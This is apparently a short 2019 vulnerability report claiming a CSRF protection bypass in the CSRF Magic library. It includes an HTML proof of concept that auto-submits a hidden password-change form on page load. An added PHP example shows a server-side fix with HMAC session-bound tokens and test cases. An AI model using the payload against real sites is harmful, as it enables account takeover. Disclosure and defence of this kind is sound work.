CSRF Magic Library
ghost_fh, Nov 14th, 2019
- Issue: CSRF vulnerability.
- Vulnerability Description: CSRF Magic is vulnerable to a CSRF protection bypass because it allows the
- CSRF token values to be tampered with. A remote attacker can exploit this flaw by crafting a
- malicious page and distributing it to the victim through social engineering, enticing them to
- click the link. Once the victim clicks the `Try again` button, the attacker can take over the account and
- perform unintended actions on the victim's behalf.
- Steps to Reproduce:
- 1. Create a malicious page containing the values below.
- <!DOCTYPE html>
- <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
- <form id="myForm" action="https://target.com/password_change.php" method="POST">
- <input type="hidden" name="password" value="secret">
- <input type="hidden" name="conformed_password" value="secret">
- </form>
- </body>
- 2. Once the "Try again" button is clicked, the attack is executed by requesting the password change.
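One way to close the flow described above on the server side, as an added example that is not part of the original paste and not csrf-magic's own code: the token is an HMAC bound to the session and compared in constant time, and a failed check returns a page that carries none of the submitted fields. It assumes the "Try again" button resubmits the rejected fields; the function names, the `csrf_token` field name, the one-hour lifetime and the demo values are hypothetical.

```php
<?php
// Added example; names are hypothetical, not csrf-magic's API.
// Token = issue time + HMAC over (session id, issue time): it cannot be
// altered or minted for another session without the server-side secret.
function csrf_issue(string $secret, string $sessionId, int $now): string
{
    return $now . ':' . hash_hmac('sha256', $sessionId . '|' . $now, $secret);
}

function csrf_verify(string $secret, string $sessionId, string $token, int $now, int $ttl = 3600): bool
{
    $parts = explode(':', $token, 2);
    if (count($parts) !== 2 || !ctype_digit($parts[0])) {
        return false; // missing or malformed token
    }
    $issued = (int) $parts[0];
    if ($issued > $now || $now - $issued > $ttl) {
        return false; // future-dated or expired
    }
    $expected = hash_hmac('sha256', $sessionId . '|' . $issued, $secret);
    return hash_equals($expected, $parts[1]); // constant-time comparison
}

// Returns [HTTP status, HTML body]. The failure body carries none of the
// submitted fields, so a retry control has nothing to replay.
function handle_password_change(array $post, string $secret, string $sessionId, int $now): array
{
    $token = is_string($post['csrf_token'] ?? null) ? $post['csrf_token'] : '';
    if (!csrf_verify($secret, $sessionId, $token, $now)) {
        return [403, '<p>Request rejected. Reopen the form on the site and submit it again.</p>'];
    }
    // The real password update would run here.
    return [200, '<p>Password changed.</p>'];
}
// Constructed demo values.
$secret = 'constructed-demo-secret';
$now    = 1700000000;
$fields = ['password' => 'secret', 'conformed_password' => 'secret'];
$good   = csrf_issue($secret, 'session-A', $now);
$cases  = [
    'no token'      => $fields,
    'altered token' => $fields + ['csrf_token' => substr($good, 0, -1) . 'x'],
    'other session' => $fields + ['csrf_token' => csrf_issue($secret, 'session-B', $now)],
    'valid token'   => $fields + ['csrf_token' => $good],
];
foreach ($cases as $name => $post) {
    [$status] = handle_password_change($post, $secret, 'session-A', $now + 60);
    echo str_pad($name, 15), $status, PHP_EOL;
}
```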